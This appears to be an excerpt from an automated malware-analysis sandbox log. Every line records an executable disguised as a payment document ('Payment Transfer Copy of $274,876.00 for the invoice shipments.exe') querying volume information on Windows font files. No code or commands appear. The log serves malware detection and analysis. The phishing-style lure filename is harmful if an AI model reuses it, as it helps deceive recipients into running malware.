          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
